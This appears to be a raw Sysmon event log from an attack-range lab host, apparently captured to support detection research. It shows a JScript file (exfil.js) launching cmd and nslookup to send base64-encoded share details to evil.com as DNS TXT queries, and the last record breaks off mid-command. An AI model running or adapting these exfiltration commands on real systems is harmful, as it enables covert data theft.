14:21:52.571{00000000-0000-0000-0000-000000000000}7036evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.445{00000000-0000-0000-0000-000000000000}5596evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.361{00000000-0000-0000-0000-000000000000}6688evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.254{00000000-0000-0000-0000-000000000000}4712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.082{00000000-0000-0000-0000-000000000000}5440evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.885{00000000-0000-0000-0000-000000000000}1736evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000216427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.735{00000000-0000-0000-0000-000000000000}7152evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000216426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.907{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A946-000000005F02}5608C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.907{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A946-000000005F02}5608C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.907{2E1864BB-1901-629A-A946-000000005F02}56085040C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-A846-000000005F02}2380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.885{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A946-000000005F02}5608C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.869{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A846-000000005F02}2380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.869{2E1864BB-18E0-629A-6742-000000005F02}39767620C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-A846-000000005F02}2380C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.875{2E1864BB-1901-629A-A846-000000005F02}2380C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleukpaw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.854{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhjpw.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-1901-629A-A646-000000005F02}46242872C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-A746-000000005F02}7608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A746-000000005F02}7608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.807{2E1864BB-1901-629A-A546-000000005F02}72964812C:\Windows\system32\cmd.exe{2E1864BB-1901-629A-A746-000000005F02}7608C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.817{2E1864BB-1901-629A-A746-000000005F02}7608C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1901-629A-A546-000000005F02}7296C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhjpw.tmp 2>&1 10341000x8000000000000000216406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.786{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A646-000000005F02}4624C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.786{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1901-629A-A646-000000005F02}4624C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.786{2E1864BB-1901-629A-A646-000000005F02}46242872C:\Windows\system32\conhost.exe{2E1864BB-1901-629A-A546-000000005F02}7296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.770{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A646-000000005F02}4624C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1901-629A-A546-000000005F02}7296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.754{2E1864BB-18E0-629A-6742-000000005F02}39761276C:\Windows\System32\WScript.exe{2E1864BB-1901-629A-A546-000000005F02}7296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:53.760{2E1864BB-1901-629A-A546-000000005F02}7296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT 